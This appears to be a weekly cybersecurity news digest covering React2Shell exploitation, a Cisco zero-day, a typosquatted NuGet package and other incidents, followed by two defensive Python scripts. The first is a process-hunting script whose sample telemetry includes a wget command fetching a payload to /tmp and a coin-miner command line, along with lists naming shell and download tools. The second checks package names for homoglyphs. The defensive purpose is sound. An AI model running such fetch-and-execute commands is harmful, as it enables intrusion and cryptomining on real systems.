WEEKLY TOP TEN: December 22, 2025, 16:00 GMT
- Microsoft Guidance on Defending Against React2Shell
Microsoft detailed observed exploitation activity for React2Shell affecting React Server Components, noting real-world attempts and post-exploitation payloads (with coin miners showing up prominently). Even if your org isn’t a “web company,” React/Next.js services can exist as internal portals, dev tooling, or vendor apps—often internet-exposed by accident. Security teams should inventory RSC usage, patch quickly, add WAF rules where feasible, and hunt for unusual child processes from web server contexts. Treat any successful pre-auth RCE as credential-compromise-adjacent: rotate secrets, review tokens, and re-issue keys.
- China-Linked “Ink Dragon” Expands Espionage
Reporting indicates the China-linked Ink Dragon espionage group expanded activity into European government environments, leveraging compromised servers as part of its operations. For defenders, this is classic “living off the land but with infrastructure”: attackers don’t need novel 0-days if they can squat on already-compromised boxes and blend into normal admin traffic. Prioritize hardening and monitoring on externally reachable services, tighten egress controls, and hunt for unusual tunneling, new scheduled tasks, and anomalous credential use across admin boundaries. Also, validate that your incident response plan assumes a multi-month dwell time.
- Cisco AsyncOS Zero-Day Exploitation (AquaShell)
Cisco has issued an urgent advisory regarding an unpatched zero-day vulnerability in its Secure Email Gateway and Web Manager appliances running AsyncOS. Attackers are actively exploiting this flaw to execute arbitrary commands with root privileges, primarily on systems where the “Spam Quarantine” feature is enabled. The campaign, tracked as UAT-9686, involves the deployment of a persistent Python-based backdoor called AquaShell and a tunneling tool named AquaTunnel. This allows threat actors to maintain long-term access and exfiltrate sensitive communication data from enterprise environments.
- 700CREDIT Breach Impacts Millions
700Credit (a fintech/data services provider supporting dealerships and credit workflows) reported a breach impacting millions of individuals. Incidents like this are especially ugly because the data tends to be identity-grade (PII that fuels fraud, synthetic identity creation, and targeted social engineering). Businesses that integrate with niche data providers should treat them as “high blast-radius” third parties: tighten vendor access paths, demand evidence of security controls (not vibes), and monitor for credential stuffing and spear-phish waves that follow public disclosure. If your workforce or customers overlap with the affected population, prep your help desk and fraud playbooks now.
- HPE OneView Maximum Severity Vulnerability
Hewlett Packard Enterprise (HPE) disclosed a critical vulnerability in its OneView management software, assigned a maximum CVSS score of 10.0. The flaw allows unauthenticated remote code execution (RCE), potentially giving an attacker complete control over the infrastructure management platform. Given that OneView is used to orchestrate large-scale data center resources, a compromise could lead to widespread lateral movement or ransomware deployment across an entire enterprise. Businesses using HPE infrastructure are urged to apply the latest security patches immediately to mitigate this catastrophic risk.
- Malicious React2Shell Scanner Targets Researchers
HackRead reported on a deceptive GitHub repository falsely advertised as a vulnerability scanner for the high-profile “React2Shell” flaw (CVE-2025-55182). The repository, created by a user named niha0wa, contained a hidden payload that leveraged mshta.exe to infect the systems of security researchers and IT professionals investigating the vulnerability. By turning a defensive tool into a malware delivery vehicle, the attackers aimed to compromise the very individuals responsible for securing their organizations. This event emphasizes the danger of using unvetted community tools during active incident response.
- CISA Adds Multiple Flaws to KEV Catalog
CISA added several vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including flaws in Gladinet CentreStack, Triofox, and Apple products. Of particular concern is CVE-2025-14611, a hard-coded cryptographic vulnerability in storage and file-sharing solutions. By including these in the KEV catalog, CISA indicates that threat actors are actively using them in the wild. Federal agencies and private-sector organizations are required or strongly advised to prioritize these remediations, as they are the most likely vectors for successful breaches.
- Google Android Security Bulletin: Active Zero-Days
Google’s mid-December security update highlighted two zero-day vulnerabilities in the Android Framework (CVE-2025-48633 and CVE-2025-48572) that are reportedly under limited, targeted exploitation. These vulnerabilities allow for information disclosure and elevation of privilege, enabling an attacker to bypass security boundaries on mobile devices. Because Android devices are frequently used for multi-factor authentication and corporate communication, these flaws represent a significant risk to organizational identity security. Security teams are encouraged to ensure all mobile fleets are updated to the December 2025 patch level.
- Typosquatting Attack on NuGet .NET Library
Security researchers discovered a malicious package on the NuGet repository named Tracer.Fody.NLog, which typosquats a popular .NET tracing library. The package uses homoglyph tricks—replacing characters with similar-looking ones—to deceive developers into downloading it. Once integrated into a project, the malware exfiltrates Stratis wallet JSON files and passwords to a Russian-based IP address. This supply-chain attack demonstrates that even well-maintained development ecosystems remain vulnerable to simple naming deceptions that can lead to significant credential and asset theft.
- SonicWall Edge Access Zero-Day Attacks
SonicWall SMA1000 series edge access devices were targeted by zero-day attacks (CVE-2025-40602). Threat actors exploited a flaw in the remote access gateway to gain unauthorized entry into corporate networks. As edge devices are the first line of defense, these vulnerabilities are particularly dangerous, often serving as the initial entry point for ransomware groups. CISA has already added this vulnerability to its KEV list, signaling that the exploitation is widespread. Organizations using SonicWall for VPN or remote access must apply the vendor-provided emergency patches.
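The React2Shell item above recommends hunting for unusual child processes spawned from web server contexts. The script below is an added example, not from the digest or from Microsoft's guidance, of what that hunt looks like over process-creation telemetry. It assumes the telemetry has been exported as JSON lines with pid, ppid, image and cmdline fields (field names are an assumption), and it walks up to three ancestors so a miner launched through an intermediate shell is still tied back to the web worker. The web-server image list, the suspicious-child list, the miner command-line hints and the sample events are all constructed for illustration.

```python
"""Hunt for shell/tool children spawned (directly or via a shell) by web-server processes.

Added example: not from the digest or from Microsoft's guidance. Field names,
image lists and the sample events below are constructed assumptions.
"""
import json

# Images that typically host React Server Components / Next.js workloads (constructed list).
WEB_SERVER_IMAGES = {"node", "next-server", "npm", "npx"}

# Children a web worker normally has no reason to spawn (constructed list).
SUSPICIOUS_CHILD_IMAGES = {"sh", "bash", "dash", "zsh", "curl", "wget", "python3", "perl", "base64", "nc"}

# Command-line fragments typical of the coin-miner payloads the digest mentions (constructed).
MINER_HINTS = ("stratum+tcp://", "--donate-level", "xmrig", "-o pool.")

# Constructed sample telemetry: one JSON object per process-creation event.
SAMPLE_EVENTS = """
{"pid": 100, "ppid": 1, "image": "node", "cmdline": "node server.js"}
{"pid": 101, "ppid": 100, "image": "node", "cmdline": "node worker.js"}
{"pid": 102, "ppid": 100, "image": "sh", "cmdline": "sh -c \\"wget -q http://203.0.113.5/x -O /tmp/x\\""}
{"pid": 103, "ppid": 102, "image": "xmrig", "cmdline": "xmrig -o pool.example.net:3333 --donate-level 1"}
{"pid": 200, "ppid": 1, "image": "sshd", "cmdline": "sshd: admin"}
{"pid": 201, "ppid": 200, "image": "bash", "cmdline": "-bash"}
"""


def parse_events(lines):
    """Parse JSON-lines telemetry, skipping blank or malformed lines."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # malformed telemetry line; skip rather than abort the hunt
    return events


def web_ancestor(event, by_pid, max_depth=3):
    """Return (ancestor_event, depth) for the nearest web-server ancestor within max_depth, else None."""
    current = event
    for depth in range(1, max_depth + 1):
        current = by_pid.get(current["ppid"])
        if current is None:
            return None
        if current["image"] in WEB_SERVER_IMAGES:
            return current, depth
    return None


def find_suspicious_children(events):
    """Return alert records for processes that descend from a web server and look out of place."""
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        found = web_ancestor(ev, by_pid)
        if found is None:
            continue  # no web-server ancestor: a shell under sshd is normal admin activity
        ancestor, depth = found
        reasons = []
        if ev["image"] in SUSPICIOUS_CHILD_IMAGES:
            reasons.append(f"web server spawned {ev['image']}")
        cmdline = ev.get("cmdline", "").lower()
        if any(hint in cmdline for hint in MINER_HINTS):
            reasons.append("miner-like command line")
        if reasons:
            alerts.append({
                "pid": ev["pid"],
                "image": ev["image"],
                "web_ancestor": ancestor["image"],
                "depth": depth,
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_children(parse_events(SAMPLE_EVENTS.splitlines())):
        print(alert)
```

On the constructed sample, the shell under the node server and the miner two hops below it are flagged, while the bash session under sshd and the node worker are not; the ancestor walk is what keeps the `sh -c` indirection from hiding the miner's origin.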
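The NuGet item above describes a package whose name relies on homoglyphs (look-alike characters) to pass for a trusted library. The check below is an added example, not from the digest or from any NuGet tooling, of how a build pipeline can catch that before a package is restored: it folds each name to a "skeleton" (NFKC normalization, case folding, a small hand-written subset of Unicode confusables mapped to ASCII, and separators collapsed) and compares the skeleton against an allowlist. It goes slightly beyond the homoglyph case by also catching separator swaps such as `-` for `.`. The confusable table is a subset, not the full Unicode confusables list, and the trusted names and candidate names are constructed for illustration.

```python
"""Flag package names that are confusable with a trusted package name.

Added example: not from the digest or from NuGet. The confusable table is a
hand-written subset of Unicode confusables; the trusted and candidate names
are constructed assumptions.
"""
import unicodedata

# Small subset of look-alike characters mapped to the ASCII letter they imitate (constructed).
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0443": "y",  # Cyrillic small u
    "\u0445": "x",  # Cyrillic small ha
    "\u0455": "s",  # Cyrillic small dze
    "\u0456": "i",  # Cyrillic small byelorussian-ukrainian i
    "\u0458": "j",  # Cyrillic small je
    "\u0131": "i",  # Latin small dotless i
    "0": "o",       # digit-for-letter swaps common in typosquats
    "1": "l",
}

SEPARATORS = ".-_"

# Constructed allowlist of package ids the project is permitted to depend on.
TRUSTED_NAMES = ["Acme.Tracing", "Acme.Tracing.Logging"]


def skeleton(name):
    """Fold a package id to the ASCII-ish form a human would perceive."""
    folded = unicodedata.normalize("NFKC", name).casefold()
    out = []
    for ch in folded:
        if ch in SEPARATORS:
            out.append(".")  # treat '.', '-' and '_' as the same separator
        else:
            out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)


def check_package_name(candidate, trusted_names):
    """Classify a candidate id as 'ok', 'confusable' (looks like a trusted id) or 'unknown'."""
    reasons = []
    if any(ord(ch) > 127 for ch in candidate):
        reasons.append("non-ASCII characters present")

    # NuGet ids are case-insensitive, so an exact match ignores case only.
    trusted_by_fold = {t.casefold(): t for t in trusted_names}
    exact = trusted_by_fold.get(candidate.casefold())
    if exact is not None:
        return {"verdict": "ok", "matched": exact, "reasons": reasons}

    cand_skel = skeleton(candidate)
    for trusted in trusted_names:
        if skeleton(trusted) == cand_skel:
            reasons.append("confusable-character or separator variant of a trusted name")
            return {"verdict": "confusable", "matched": trusted, "reasons": reasons}
    return {"verdict": "unknown", "matched": None, "reasons": reasons}


if __name__ == "__main__":
    # Constructed candidates: genuine, case variant, Cyrillic 'е' homoglyph, separator swap, unrelated.
    for name in ["Acme.Tracing.Logging", "acme.tracing.logging", "Acm\u0435.Tracing.Logging",
                 "Acme-Tracing", "Acme.Tracing.Core"]:
        print(repr(name), check_package_name(name, TRUSTED_NAMES))
```

A `confusable` verdict is the one to fail the build on: the id is not on the allowlist, yet its skeleton collides with one that is, which is exactly the shape of the homoglyph deception the digest describes. An `unknown` verdict is an ordinary allowlist miss and can go through the normal review path.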
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The ten stories above were judged the most significant of the week, ranked from highest risk downward, drawing on multiple sources where available.